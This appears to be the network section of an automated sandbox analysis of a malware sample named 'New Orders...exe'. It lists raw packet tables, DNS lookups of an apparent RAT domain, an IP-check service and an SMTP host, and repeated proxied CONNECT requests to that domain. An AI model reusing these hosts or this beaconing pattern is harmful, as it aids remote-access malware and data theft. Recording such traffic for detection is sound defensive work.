                                                                                        Mar 11, 2024 16:16:41.804296970 CET4971844607192.168.2.9162.241.6.97
                                                                                        Mar 11, 2024 16:16:41.804299116 CET5090231247192.168.2.9202.40.181.220
                                                                                        Mar 11, 2024 16:16:41.805037022 CET805097850.207.199.85192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.805102110 CET515391080192.168.2.944.226.167.102
                                                                                        Mar 11, 2024 16:16:41.805192947 CET5153826666192.168.2.98.210.150.195
                                                                                        Mar 11, 2024 16:16:41.805633068 CET515405678192.168.2.946.98.192.233
                                                                                        Mar 11, 2024 16:16:41.806066990 CET5154180192.168.2.9196.1.95.124
                                                                                        Mar 11, 2024 16:16:41.806075096 CET5154219065192.168.2.945.79.134.70
                                                                                        Mar 11, 2024 16:16:41.806683064 CET273915085172.195.34.60192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.807075977 CET273915085172.195.34.60192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.807475090 CET414551356174.64.199.82192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.807482958 CET808150777178.141.249.246192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.807564020 CET513564145192.168.2.9174.64.199.82
                                                                                        Mar 11, 2024 16:16:41.807564974 CET515438080192.168.2.9103.209.68.197
                                                                                        Mar 11, 2024 16:16:41.808087111 CET513564145192.168.2.9174.64.199.82
                                                                                        Mar 11, 2024 16:16:41.808088064 CET5154480192.168.2.9103.49.202.252
                                                                                        Mar 11, 2024 16:16:41.808377981 CET515453128192.168.2.9103.35.190.18
                                                                                        Mar 11, 2024 16:16:41.808379889 CET515464153192.168.2.9183.88.212.167
                                                                                        Mar 11, 2024 16:16:41.808480978 CET805086450.174.145.14192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.809051991 CET3128497588.209.255.13192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.809161901 CET5154727391192.168.2.972.195.34.60
                                                                                        Mar 11, 2024 16:16:41.809168100 CET515484145192.168.2.980.78.64.70
                                                                                        Mar 11, 2024 16:16:41.809525013 CET497583128192.168.2.98.209.255.13
                                                                                        Mar 11, 2024 16:16:41.810400009 CET515499553192.168.2.9132.148.129.254
                                                                                        Mar 11, 2024 16:16:41.810575962 CET8051388104.16.105.146192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.811603069 CET8051394104.18.237.128192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.811773062 CET808050477112.78.164.248192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.811878920 CET5138880192.168.2.9104.16.105.146
                                                                                        Mar 11, 2024 16:16:41.812007904 CET4980649902162.214.225.223192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.812011003 CET5139480192.168.2.9104.18.237.128
                                                                                        Mar 11, 2024 16:16:41.812016010 CET8051397104.16.105.207192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.812079906 CET4990249806192.168.2.9162.214.225.223
                                                                                        Mar 11, 2024 16:16:41.812131882 CET5139780192.168.2.9104.16.105.207
                                                                                        Mar 11, 2024 16:16:41.812144041 CET5138880192.168.2.9104.16.105.146
                                                                                        Mar 11, 2024 16:16:41.812397957 CET5139780192.168.2.9104.16.105.207
                                                                                        Mar 11, 2024 16:16:41.812400103 CET5139480192.168.2.9104.18.237.128
                                                                                        Mar 11, 2024 16:16:41.812659979 CET99950931138.121.15.229192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.813246012 CET515504145192.168.2.991.185.236.239
                                                                                        Mar 11, 2024 16:16:41.814132929 CET51551443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.814143896 CET515529002192.168.2.9218.57.210.186
                                                                                        Mar 11, 2024 16:16:41.814153910 CET4435155143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.814599037 CET515538080192.168.2.9177.55.247.41
                                                                                        Mar 11, 2024 16:16:41.814893961 CET51551443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.815341949 CET51551443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.815357924 CET4435155143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.815376997 CET5155434031192.168.2.9109.195.23.223
                                                                                        Mar 11, 2024 16:16:41.815407038 CET4435155143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.815896988 CET8051419172.67.182.165192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.816066980 CET515554145192.168.2.958.75.126.235
                                                                                        Mar 11, 2024 16:16:41.816164017 CET80805078491.202.230.219192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.816198111 CET5141980192.168.2.9172.67.182.165
                                                                                        Mar 11, 2024 16:16:41.816198111 CET5141980192.168.2.9172.67.182.165
                                                                                        Mar 11, 2024 16:16:41.816493034 CET286955000992.204.134.38192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.817079067 CET5000928695192.168.2.992.204.134.38
                                                                                        Mar 11, 2024 16:16:41.817130089 CET51556443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.817130089 CET515571080192.168.2.994.131.107.45
                                                                                        Mar 11, 2024 16:16:41.817157984 CET4435155643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.817318916 CET51556443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.817348957 CET99951096187.49.191.14192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.818053961 CET51556443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.818061113 CET5155880192.168.2.950.217.226.40
                                                                                        Mar 11, 2024 16:16:41.818072081 CET4435155643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.818093061 CET4435155643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.818918943 CET515608080192.168.2.9103.60.161.18
                                                                                        Mar 11, 2024 16:16:41.818939924 CET5155923998192.168.2.9148.66.130.53
                                                                                        Mar 11, 2024 16:16:41.819758892 CET5156224019192.168.2.9211.222.98.67
                                                                                        Mar 11, 2024 16:16:41.819760084 CET51561443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.819788933 CET4435156143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.819928885 CET509039191192.168.2.951.83.184.241
                                                                                        Mar 11, 2024 16:16:41.819937944 CET504103629192.168.2.991.220.69.43
                                                                                        Mar 11, 2024 16:16:41.819937944 CET5012080192.168.2.950.145.6.36
                                                                                        Mar 11, 2024 16:16:41.819941044 CET51561443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.819941998 CET4990064768192.168.2.9173.212.250.16
                                                                                        Mar 11, 2024 16:16:41.819942951 CET509058085192.168.2.9103.105.55.170
                                                                                        Mar 11, 2024 16:16:41.820204020 CET41455140798.181.137.83192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.820255995 CET514074145192.168.2.998.181.137.83
                                                                                        Mar 11, 2024 16:16:41.821330070 CET51561443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.821352005 CET4435156143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.821368933 CET4435156143.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.822546959 CET319084979564.227.108.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.823120117 CET319084979564.227.108.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.823187113 CET567850073223.25.98.82192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.823405027 CET4979531908192.168.2.964.227.108.25
                                                                                        Mar 11, 2024 16:16:41.823533058 CET4979531908192.168.2.964.227.108.25
                                                                                        Mar 11, 2024 16:16:41.823935986 CET31295005620.219.177.85192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.824589968 CET31295133620.219.235.172192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.824655056 CET5156315673192.168.2.943.133.74.172
                                                                                        Mar 11, 2024 16:16:41.824882984 CET5156431908192.168.2.964.227.108.25
                                                                                        Mar 11, 2024 16:16:41.825074911 CET515651403192.168.2.972.10.164.178
                                                                                        Mar 11, 2024 16:16:41.825246096 CET41455085272.210.221.197192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.825301886 CET41455085272.210.221.197192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.825895071 CET51566443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.825918913 CET4435156643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.826054096 CET51566443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.826142073 CET51566443192.168.2.943.134.238.25
                                                                                        Mar 11, 2024 16:16:41.826144934 CET515674145192.168.2.972.210.221.197
                                                                                        Mar 11, 2024 16:16:41.826157093 CET4435156643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.826178074 CET4435156643.134.238.25192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.826220989 CET414550855174.77.111.197192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.826358080 CET414550855174.77.111.197192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.826365948 CET515688083192.168.2.943.255.113.232
                                                                                        Mar 11, 2024 16:16:41.827297926 CET515694145192.168.2.9174.77.111.197
                                                                                        Mar 11, 2024 16:16:41.827368021 CET515705678192.168.2.9110.78.82.233
                                                                                        Mar 11, 2024 16:16:41.828239918 CET5157241697192.168.2.9162.215.219.157
                                                                                        Mar 11, 2024 16:16:41.828246117 CET5157180192.168.2.950.200.12.85
                                                                                        Mar 11, 2024 16:16:41.828404903 CET8051345104.18.136.28192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.828438997 CET8051345104.18.136.28192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.828650951 CET5134580192.168.2.9104.18.136.28
                                                                                        Mar 11, 2024 16:16:41.829143047 CET8051345104.18.136.28192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.829293013 CET5134580192.168.2.9104.18.136.28
                                                                                        Mar 11, 2024 16:16:41.829683065 CET80805081837.120.192.154192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.832156897 CET316795023298.162.25.29192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.832192898 CET316795023298.162.25.29192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.835551977 CET5105626887192.168.2.972.10.160.170
                                                                                        Mar 11, 2024 16:16:41.835551977 CET504635836192.168.2.9185.158.248.95
                                                                                        Mar 11, 2024 16:16:41.835711002 CET5002280192.168.2.950.168.210.239
                                                                                        Mar 11, 2024 16:16:41.836689949 CET3077050952108.181.132.116192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.836981058 CET805136050.174.216.110192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.839342117 CET888851161203.74.125.18192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.841075897 CET567851293202.144.134.150192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.841408968 CET511618888192.168.2.9203.74.125.18
                                                                                        Mar 11, 2024 16:16:41.841440916 CET415350050103.83.105.167192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.842061996 CET226455093867.43.236.18192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.842226028 CET414551090184.181.217.210192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.842238903 CET414551090184.181.217.210192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.842253923 CET512935678192.168.2.9202.144.134.150
                                                                                        Mar 11, 2024 16:16:41.844616890 CET805082789.31.143.12192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.844731092 CET805082789.31.143.12192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.844743967 CET805082789.31.143.12192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.844847918 CET5082780192.168.2.989.31.143.12
                                                                                        Mar 11, 2024 16:16:41.845788956 CET805062258.234.116.197192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.846618891 CET414550900174.64.199.79192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.846921921 CET414550900174.64.199.79192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.847026110 CET41455136772.195.34.41192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.847122908 CET513674145192.168.2.972.195.34.41
                                                                                        Mar 11, 2024 16:16:41.848001003 CET1279251127112.30.155.83192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.848329067 CET5112712792192.168.2.9112.30.155.83
                                                                                        Mar 11, 2024 16:16:41.848387003 CET41455022824.249.199.4192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.848468065 CET41455021568.1.210.163192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.848475933 CET41455021568.1.210.163192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.848546982 CET41455022824.249.199.4192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.849004984 CET108050711138.36.150.16192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.849663019 CET507111080192.168.2.9138.36.150.16
                                                                                        Mar 11, 2024 16:16:41.850084066 CET56785134081.91.157.134192.168.2.9
                                                                                        Mar 11, 2024 16:16:41.850481987 CET513405678192.168.2.981.91.157.134
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Mar 11, 2024 16:16:35.796531916 CET192.168.2.91.1.1.10x5a2eStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:40.283952951 CET192.168.2.91.1.1.10xf0d8Standard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:45.457623959 CET192.168.2.91.1.1.10x7563Standard query (0)artemis-rat.comA (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:52.295142889 CET192.168.2.91.1.1.10xb44aStandard query (0)www.avis.com.hnA (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:54.225604057 CET192.168.2.91.1.1.10xf1cfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:55.913316011 CET192.168.2.91.1.1.10xd577Standard query (0)smtp.fvpumps.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Mar 11, 2024 16:16:34.064618111 CET1.1.1.1192.168.2.90x6933No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:34.064618111 CET1.1.1.1192.168.2.90x6933No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:35.951595068 CET1.1.1.1192.168.2.90x5a2eNo error (0)github.com140.82.114.3A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:40.445154905 CET1.1.1.1192.168.2.90xf0d8No error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:45.613595009 CET1.1.1.1192.168.2.90x7563No error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:45.613595009 CET1.1.1.1192.168.2.90x7563No error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:52.474026918 CET1.1.1.1192.168.2.90xb44aNo error (0)www.avis.com.hn104.21.84.251A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:52.474026918 CET1.1.1.1192.168.2.90xb44aNo error (0)www.avis.com.hn172.67.199.231A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:54.380264997 CET1.1.1.1192.168.2.90xf1cfNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:54.380264997 CET1.1.1.1192.168.2.90xf1cfNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:54.380264997 CET1.1.1.1192.168.2.90xf1cfNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:56.284791946 CET1.1.1.1192.168.2.90xd577No error (0)smtp.fvpumps.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:56.284791946 CET1.1.1.1192.168.2.90xd577No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:56.284791946 CET1.1.1.1192.168.2.90xd577No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:56.284791946 CET1.1.1.1192.168.2.90xd577No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                        Mar 11, 2024 16:16:56.284791946 CET1.1.1.1192.168.2.90xd577No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.9497624.182.9.1084437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.027410030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.9497744.182.9.1084437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.065450907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.949727172.67.254.127807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.105360985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.259708881 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.949743104.16.226.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.141128063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.295651913 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.949750104.21.6.88807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.152795076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.307306051 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.949739162.241.70.64494787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.171195030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.679276943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.304316044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.949770172.67.182.169807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.199973106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.354484081 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.949744142.54.237.3441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.215432882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.949775104.17.9.114807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.222470045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.376835108 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.94975772.10.160.90309517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.241241932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
